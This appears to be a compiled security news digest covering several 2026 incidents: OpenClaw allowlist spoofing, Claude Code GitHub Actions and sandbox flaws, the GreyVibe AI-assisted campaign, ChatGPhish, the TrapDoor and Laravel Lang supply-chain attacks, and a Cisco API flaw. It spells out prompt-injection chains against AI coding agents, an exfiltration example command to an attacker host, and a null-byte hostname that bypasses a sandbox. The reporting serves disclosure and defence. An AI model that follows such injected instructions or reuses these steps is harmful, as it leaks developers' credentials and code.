𝘪𝘯𝘤𝘭𝘶𝘥𝘪𝘯𝘨 𝘢𝘯𝘺 𝘸𝘢𝘳𝘳𝘢𝘯𝘵𝘪𝘦𝘴 𝘰𝘧 𝘮𝘦𝘳𝘤𝘩𝘢𝘯𝘵𝘢𝘣𝘪𝘭𝘪𝘵𝘺 𝘰𝘳 𝘧𝘪𝘵𝘯𝘦𝘴𝘴 𝘧𝘰𝘳 𝘢 𝘱𝘢𝘳𝘵𝘪𝘤𝘶𝘭𝘢𝘳 𝘱𝘶𝘳𝘱𝘰𝘴𝘦.

🚨 Five OpenClaw Zero-Days Allowed Attackers to Hijack AI Agent Access Across Messaging Platforms Security researchers discovered five zero-day vulnerabilities in OpenClaw, an AI agent integration platform supporting Slack, Discord, Microsoft Teams, Matrix, and Telegram. The flaws stem from a recurring design issue where mutable display names are resolved to stable user IDs during service initialization. Attackers can impersonate trusted users simply by renaming themselves to match an allowlisted identity. The Trust Model Assumption OpenClaw relies on user-defined allowlists to determine who can interact with an agent. Trusted identities are assumed to have access to sensitive data, internal APIs, or system-level execution capabilities. The model breaks down due to improper identity resolution during allowlist processing. Core Vulnerability Pattern Human-readable identifiers (display names, usernames) are resolved to stable user IDs during service initialization. Display names are mutable across most chat platforms. Attacker changes display name to match an allowlisted user before a service restart. System binds the attacker's ID into the trusted allowlist. Attacker gains full control over agent interactions. Legitimate user is silently excluded. ⚠️ Affected Platforms Initially identified in Telegram integration (patched under GHSA-mj5r-hh7j-4gxf). Same root cause persisted across five additional channel extensions: Slack, Discord, Matrix, Zalo, and Microsoft Teams. Each implementation independently reintroduced the same insecure pattern. 🔴 Technical Root Cause While runtime checks typically validate stable user IDs, initialization logic resolves allowlist entries via directory lookups based on mutable fields (displayName, username). Flawed startup resolution process. Class of vulnerability aligns with CWE-639 (bypassing authorization through user-controlled identifiers). Discovery Method Vulnerabilities identified using an AI-driven static analysis tool called agentgg. Tool generates custom detectors based on historical advisories. Analyzed prior OpenClaw vulnerabilities to develop targeted detection logic for recurring anti-patterns. Identified flaw replicated across multiple modules. Impact Compromised access can translate into arbitrary command execution. Data exfiltration from connected systems. Lateral movement within integrated environments. 🛡️ Remediation Each finding acknowledged and addressed by OpenClaw maintainers. Fixes enforce strict ID-based matching. Name-based resolution gated behind explicit configuration flags. ⚠️ Systemic Issue Highlighted Patching one component does not eliminate the underlying vulnerability class. Same flaw can silently propagate across parallel implementations. Distributed development and inconsistent security enforcement allowed recurrence. Five zero-day vulnerabilities across multiple messaging platforms shared the same root cause: mutable display names trusted for identity resolution during initialization. Attackers gain agent access by renaming themselves to match an allowlisted user.

🤖 Claude Code GitHub Actions Flaw Could Let Attackers Compromise Any Repository A critical supply chain vulnerability in Claude Code's GitHub Actions workflow could allow attackers to compromise any repository using Anthropic's official CI/CD integration, including Anthropic's own infrastructure. When combined with prompt injection techniques, an unauthenticated external attacker could exfiltrate secrets, steal OIDC tokens, and push malicious code to downstream repositories. The flaw was patched in Claude Code GitHub Actions version 1.0.94. 🔴 The Permission Model Flaw → The [checkWritePermissions] function unconditionally trusted any actor ending in [bot], regardless of actual permissions. → GitHub Apps have implicit read access to public repositories. → GitHub Apps can create issues or pull requests on any public repo using only an installation token. 🎯 Attack Steps → Create a malicious GitHub App. → Install it on any attacker-controlled repository (no special permissions required). → Use its installation token to open an issue or pull request in the target repository. → Because the actor appeared as a GitHub App bot, the permission check returned true. → Agent mode lacked an additional [checkHumanActor] safeguard at the time of discovery. 💣️ Prompt Injection Execution → Attacker crafts a malicious issue description with a fake error message. → Tricks Claude Code into executing embedded commands. → Claude Code permits certain Bash commands (cat, head) without explicit user approval. → Attacker reads [/ proc/ self/ environ], exposing all environment variables passed to the workflow process. 💣️ OIDC Token Theft → Among exposed variables: [ACTIONS_ID_TOKEN_REQUEST_TOKEN[ and [ACTIONS_ID_TOKEN_REQUEST_URL[. → These credentials request an OpenID Connect (OIDC) token from GitHub Actions. → Claude Code GitHub Actions uses this OIDC token to obtain a privileged Claude GitHub App installation token from Anthropic's backend. ⚠️ Privilege Escalation → Attacker replicates the token exchange process. → Obtains a GitHub App token with write access to repository contents, issues, pull requests, and workflows. → The mcp__github__update_issue MCP tool (permitted in Anthropic's issue triage workflow) is abused to write stolen secrets back into a public issue where the attacker can read them. 💥 Supply Chain Impact → The anthropics/claude-code-action repository used a vulnerable agent mode workflow. → Successful exploit would allow attacker to inject malicious code directly into the action's source. → Malicious code would propagate to every downstream repository depending on that action. 🎯 Additional Attack Vector → Anthropic's example workflows used allowed_non_write_users: "*" → Combined with issues: write permissions and id-token: write. → External attacker chains two workflows: triage workflow to steal GITHUB_TOKEN, then edit an issue to inject prompts into tag-mode workflow. → Escalates to full repository compromise without needing the GitHub App bypass. 💣️ Exfiltration via gh issue view → Prompt injection could instruct Claude to embed secrets in URL path arguments. → Example: gh issue view [https : //attacker .com / <secret>] → Sends credentials to an external server. 🟢 Patches in v1.0.94 → Added checkHumanActor call to agent mode. → Disabled workflow run summary section by default. → Scrubbed environment variables from child processes spawned by Claude Code. → Implemented custom gh command wrapper that validates arguments and blocks exfiltration-capable URL patterns. → Added logic to ignore issues and comments edited after a workflow is triggered. 💸 CVSS and Bounty → Researcher rated vulnerabilities at CVSS v4.0 score of 7.8. → Anthropic awarded $3,800 plus $1,000 bonus. 🛡️ Recommendations → Audit any workflow using allowed_non_write_users → Restrict exposed secrets to only the Anthropic API key and GITHUB_TOKEN → Review workflow run logs for indicators of compromise

GreyVibe: A Russia-Nexus Threat Actor Using AI to Supercharge Cyberattacks A previously undocumented threat actor named GreyVibe has been actively targeting Ukrainian military, government, civilian, and business entities since August 2025. The group, attributed to Russian-speaking operators in the Moscow time zone, uses AI extensively across every phase of its operations, from building fake websites and crafting lures to developing custom malware and generating post-compromise tooling. While researchers are confident in the Russia-nexus attribution, they are less certain whether GreyVibe is purely cybercriminal, nation-state, or a hybrid of both. 🤖 GreyVibe's Use of AI Tools Uses top-tier AI including Ideogram AI, ChatGPT, and Google Gemini. AI compensates for capability gaps within the group. Reduces historical backlinks to prior activity, complicating tracking and attribution. Enables lower-sophistication actors to punch above their weight. 🎯 Attack Chains Observed 🔴 PhantomMail Spear-phishing emails distribute links to malicious ZIP or RAR archives on Google Drive and 4sync. Archives contain JavaScript-based loaders that launch a decoy document. PhantomRelay, a PowerShell-based RAT, profiles the host and runs PowerShell scripts and Windows commands. 🔴 PhantomClick ClickFix-style fake CAPTCHA pages on bogus domains masquerading as Zoom and LAPAS. Tricks users into running commands that initiate PhantomRelay infection chain. 🔴 PrincessClub Fake Ukrainian adult-club websites deliver FallSpy (Android spyware) and PhantomRelayV1 or LegionRelay on Windows. Subsequent iterations introduced WebRTC-based live call feature to capture victim audio and video. LegionRelay: PowerShell-based RAT supporting file enumeration, exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data exfiltration, and RDP access setup. PhantomRelayV1: variant with custom watchdog persistence mechanism. 🔴 DroneLink Websites masquerading as charitable foundations supporting the Armed Forces of Ukraine. Delivers WireGuard and LegionRelay. 🔴 Nebo FallSpy sample mimics a Russian-language login screen. Likely designed to deceive Ukrainian military personnel into thinking they were accessing a Russian military terminal. Notable Weakness GreyVibe introduced design flaws into its LLM-generated LegionRelay Windows malware. Mistakes not normally attributed to elite state actors. This error enabled researchers to monitor and track GreyVibe activity over an extended period since mid-2025. 🔍️ Attribution Clues Russian-speaking operators in Moscow time zone. Targeting aligns closely with Russian state interests. Some members may not be elite state operators. Early-stage development artifacts include internet slang-based naming: 'letsrollboyos', 'totallyunsus', 'cuteuwu'. GreyVibe offers a glimpse into how future cybercriminal and state-aligned groups will operate: AI used across every phase, filling capability gaps, generating fresh operational profiles, and complicating attribution.

🤖 ChatGPhish: How ChatGPT's Trust in Markdown Turns Web Summaries into Phishing Vectors A vulnerability in OpenAI ChatGPT leverages the AI assistant's implicit trust in Markdown links and images to trigger prompt injections and enable phishing attacks. The technique, named ChatGPhish, exploits the way ChatGPT renders responses from summarized web pages. Any ordinary web page that a user asks ChatGPT to summarize can inject malicious links, fake security alerts, remote images, or QR codes directly into the trusted assistant interface. ⚠️ The Vulnerability Mechanism → ChatGPT's response renderer trusts Markdown links and image URLs originating from third-party pages the assistant has summarized. → The assistant auto-fetches those images and surfaces links as live, clickable elements inside the trusted UI. → Attacker appends a small payload to any web page the victim later prompts ChatGPT to summarize. → When the answer is rendered, attacker-hosted images are automatically fetched, leaking the victim's IP address, User-Agent, and Referer details. 🎯 Attack Scenarios → Malicious Markdown links rendered as live clickable elements inside the assistant's response. → Fake system-style security alerts displayed directly in the ChatGPT interface. QR codes served from an attacker's S3 bucket trick victims into scanning with mobile devices, bypassing desktop URL filters and enterprise security controls. → The assistant output is styled identically to genuine ChatGPT responses, making malicious content indistinguishable from legitimate output. Why Traditional Security Boundaries Fail → The browser's same-origin policy offers no protection because the AI assistant executes with the user's authenticated context. → Attacker-controlled web content can influence rendered assistant output without explicit origin labeling. → The browser itself becomes a practical, low-barrier delivery surface for phishing, device pivoting, and passive reconnaissance. Earlier in March 2026, researchers demonstrated how an attacker-controlled email with crafted instructions, when summarized by Microsoft Copilot, could influence its output via cross-prompt injection (XPIA). The core risk, as identified in OWASP LLM01:2025, is that LLMs cannot reliably distinguish between legitimate instructions and attacker-supplied content embedded in retrieved data. 🛡️ Mitigations → Avoid using AI browser summarization features on pages containing user-generated or untrusted content (Reddit, public GitHub READMEs, blogs). → Restrict AI browser permissions to the minimum necessary; require human approval before any link interaction within summarized responses. → Treat any clickable link, image, or alert appearing inside an AI summary as potentially attacker-controlled until origin attribution is clearly displayed. → Deploy semantic input/output filtering and anomaly detection on AI-integrated surfaces within enterprise environments. → Monitor AI browser activity logs for unexpected outbound image fetch requests to unknown or URL-shortened endpoints. Until clear source separation is enforced between retrieved web content and rendered assistant output, browser-integrated AI summarization remains an adversarial surface.

🚨 TrapDoor Campaign Targets npm, PyPI, and Crates[.]io to Steal Developer Credentials A coordinated cross-ecosystem software supply chain attack named TrapDoor has been discovered across npm, PyPI, and Crates[.]io, spanning more than 34 malicious packages and 384 related versions. The campaign targets developers in crypto, DeFi, Solana, and AI communities, stealing developer secrets, crypto wallets, SSH keys, cloud credentials, browser data, and environment variables. Several packages remain live at the time of writing. 🎯 The Attack Vectors npm: postinstall hooks and remote JavaScript payloads executed during package imports. PyPI: auto-execution on import, downloading remote JavaScript from attacker-controlled GitHub Pages domain. Crates[.]io: build[.]rs scripts targeting Sui and Move developers. Shared Payload: trap-core.js (npm) → Scans for credentials and developer secrets. → Validates stolen credentials using AWS and GitHub API calls. → Creates persistence via cron jobs, systemd services, Git hooks. → Moves across network via SSH. Rust Crates → Search for local keystores. → Encrypt data using hardcoded XOR key. → Exfiltrate to GitHub Gists. → Trigger execution via build[.]rs script. Python Packages → Auto-executed on import. → Downloads JavaScript from ddjidd564.github[.]io → Runs it using "node -e" → External payload hosting allows attacker to update behavior without publishing new PyPI release. 🤖 AI Assistant Injection → Implants .cursorrules and CLAUDE[.]md with hidden instructions using zero-width Unicode characters. → Aims to trick AI assistants into running a "security scan" that results in secret discovery and exfiltration. → Pull requests opened across projects including browser-use/browser-use, langchain-ai/langchain, and langflow-ai/langflow. ⚠️ What Gets Stolen SSH keys, Sui, Solana, and Aptos wallet data, AWS credentials, GitHub tokens and credentials, Browser profile data and login databases, Crypto wallet extension data, environment variables, API keys, and local development configuration files. Persistence and Lateral Movement → Stolen SSH keys can be reused for lateral movement. → Cloud and GitHub credentials can expose repositories, CI/CD systems, private packages, and deployment environments. 🛡️ Immediate Actions → Audit lockfiles for suspicious dependencies or unexpected version updates. → Inspect .cursorrules and CLAUDE[.]md files for hidden characters or unusual instructions. → Rotate AWS keys, GitHub tokens, and SSH keys immediately if you have interacted with suspicious developer tools. TrapDoor combines typosquatting, ecosystem-specific execution paths (build[.]rs, postinstall, import-time), and AI assistant injection. Attackers are actively experimenting with AI development environments as part of supply chain malware campaigns.

🚨 Laravel Lang Compromised with RCE Backdoor Across 700+ Package Versions The community-maintained Laravel Lang project was compromised with a remote code execution backdoor spanning hundreds of package versions. The attack affected laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, across approximately 700 historical versions. Applications that installed compromised versions may have executed the backdoor automatically when Composer's autoloader ran. 🎯 The Attack Method GitHub allows version tags to point to commits from a fork of the same repository. Attacker exploited this to create tags pointing to commits in a malicious fork they controlled. No malicious code was ever committed to the official repositories. Tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart. 💣️ The Payload Execution Malicious src/helpers.php executed automatically due to Composer's autoload.files directive. Hid malware from standard repository audits. Inherited full web application permissions. Initial Dropper Behavior: Masquerades as a standard Laravel localization function. Fingerprints host system using hardware metrics. Generates per-host marker (MD5 hash combining directory path, system architecture, and inode). Ensures payload only triggers once per machine. Prevents redundant executions to avoid detection. Secondary Payload: Disables SSL verification. Fetches secondary script from obfuscated command-and-control server. Launches silently via OS-specific methods. Credential Stealer Modules (15 Collectors): Cloud access keys: AWS, GCP, Azure, DigitalOcean. Infrastructure configs: Kubernetes profiles, Docker tokens, HashiCorp Vault secrets. Developer assets: SSH private keys, Git credentials, shell history files. Saved browser passwords, cryptocurrency wallets, password manager databases. Exfiltration: Steals sensitive developer secrets, cloud metadata, database credentials, environment files. Encrypts harvested data with AES-256. Exfiltrates to attacker infrastructure. Deletes itself to evade forensic detection. 🛡️ Immediate Actions: Rotate all application secrets, database credentials, and API keys. Inspect composer.lock files and block affected Laravel-Lang packages. Audit outbound network traffic for suspicious connections. Systems running compromised packages should be entirely rebuilt from known-good images.

🚨 Cisco Secure Workload REST API Flaw: CVSS 10.0 Unauthenticated Access to Site Admin Privileges A maximum-severity vulnerability in Cisco Secure Workload could allow an unauthenticated, remote attacker to access sensitive data and make configuration changes across tenant boundaries. The flaw resides in the access validation of internal REST APIs. An attacker can send a crafted API request to an affected endpoint and gain the privileges of the Site Admin role. 🔴 The Vulnerability CVE-2026-20223 – CVSS 10.0. Unauthorized API access due to insufficient validation and authentication when accessing REST API endpoints. Attacker sends crafted API request to an affected endpoint. Gains privileges of Site Admin role. Can read sensitive information and make configuration changes across tenant boundaries. ⚠️ Affected Products Cisco Secure Workload Cluster Software on SaaS deployments. Cisco Secure Workload Cluster Software on on-premises deployments. Regardless of device configuration. 💥 Exploitation Status Cisco found the vulnerability during internal security testing. No evidence of exploitation in the wild. No Workarounds address this vulnerability. 📜 Context The disclosure comes one week after Cisco revealed CVE-2026-20182 (CVSS 10.0), an authentication bypass in Catalyst SD-WAN Controller exploited by threat actor UAT-8616.

🚨 Claude Code's Network Sandbox Had a Five-Month Bypass! A critical network sandbox bypass vulnerability existed in Claude Code for approximately five and a half months, affecting every release from October 20, 2025, through v2.1.89. The flaw, a SOCKS5 hostname null-byte injection, allowed attackers to exfiltrate credentials, source code, and environment variables from developer systems. Anthropic silently patched the issue with no mention of a security fix in release notes and no CVE published for the vulnerability. The Vulnerability SOCKS5 hostname null-byte injection in Claude Code's network sandbox. Affected releases from v2.0.24 (October 20, 2025) through v2.1.89. Approximately 130 published versions over 5.5 months. Fixed in v2.1.90 on April 1, 2026 (silent patch, no advisory). How It Works Sandbox routes outbound traffic through a SOCKS5 proxy. JavaScript uses endsWith() check to validate hostnames against allowlist (e.g., *.google.com). Attacker crafts hostname like attacker- [host .com \ x00. google .com] JavaScript sees trailing .google.com → approves connection. libc's getaddrinfo() terminates at null byte (\x00) → resolves [attacker - host . com] The blocked host is reached. The sandbox is bypassed. Vulnerable Code sandbox-runtime <= 0.0.42 passed raw DOMAINNAME bytes from SOCKS5 CONNECT request into matcher. No null-byte rejection, no length cap, no character whitelist. 🎯 Attack Chain Paired with Prompt Injection Malicious instruction hidden in GitHub issue, README, or documentation file. Claude Code reads the hidden instruction. Attacker-controlled code runs inside the sandbox. Exploits null-byte injection to bypass network restrictions. ⚠️ What Can Be Exfiltrated AWS credentials from ~/.aws/. GitHub tokens from ~/.config/gh/. Cloud instance metadata from 169.254.169.254. Internal API endpoints and corporate intranet resources. Environment variables and model API keys. All transmitted via raw SOCKS5, bypassing standard HTTP egress logs. The Disclosure Gap Researcher Aonan Guan disclosed the vulnerability. Anthropic closed HackerOne report #3646509 as a duplicate. As of May 10, 2026, no CVE published in NVD or GitHub Advisory Database. CVE-2025-66479 is the only CVE for either sandbox finding, issued against sandbox-runtime, not Claude Code. Claude Code security advisories page lists no sandbox vulnerabilities. 🛡️ Immediate Actions Update to Claude Code v2.1.90 or later. Verify version with claude --version. Anyone who ran a wildcard allowlist on a credential-bearing system between October 20, 2025, and upgrade date should: Audit outbound SOCKS-mediated traffic logs. Rotate all reachable credentials. Treat the vendor sandbox as defense-in-depth, not as a security boundary. Enforce egress controls at the network or hypervisor level outside the agent's reach.